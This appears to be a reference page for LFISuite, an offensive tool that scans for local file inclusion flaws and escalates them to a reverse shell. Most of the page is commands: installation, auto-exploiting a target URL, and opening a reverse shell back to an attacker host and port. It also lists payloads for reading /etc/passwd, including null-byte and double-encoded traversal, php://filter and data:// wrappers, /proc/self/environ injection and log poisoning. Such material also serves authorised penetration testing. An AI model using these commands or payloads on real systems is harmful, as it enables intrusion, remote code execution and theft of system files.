Description
LFISuite is an all-in-one LFI exploitation suite. It performs automatic scanning for LFI vulnerabilities and can escalate to reverse shell via multiple techniques including /proc/self/environ, PHP filter, log poisoning, and data:// wrapper.
Installation
BASH
git clone https://github.com/D35m0nd142/LFISuite.git
cd LFISuite
pip install -r requirements.txtBasic Usage
BASH
# Interactive mode
python2 lfisuite.py
# Select options:
# 1. Exploiter — exploit known LFI
# 2. Scanner — scan for LFI
# 3. Reverse shell — LFI → RCE with reverse shellAdvanced Usage
BASH
# Auto-exploit URL
python2 lfisuite.py --exploit -u "https://target.com/page?file="
# Scan mode with URL list
python2 lfisuite.py --scan -f urls.txt
# Reverse shell through LFI
python2 lfisuite.py --revshell -u "https://target.com/page?file=" --lhost 10.0.0.1 --lport 4444Techniques Used
- Path traversal (../../etc/passwd)
- Null byte injection (../../etc/passwd%00)
- Double encoding (%252e%252e%252f)
- PHP filter wrappers (php://filter/convert.base64-encode/resource=)
- data:// wrapper injection
- /proc/self/environ injection
- Log file poisoning (/var/log/apache2/access.log)
Common Workflows
BASH
# Quick LFI scan
python2 lfisuite.py --scan -f target_urls.txt
# If LFI found, try for shell
python2 lfisuite.py --revshell -u "https://target.com/page?file=" --lhost YOUR_IP --lport 4444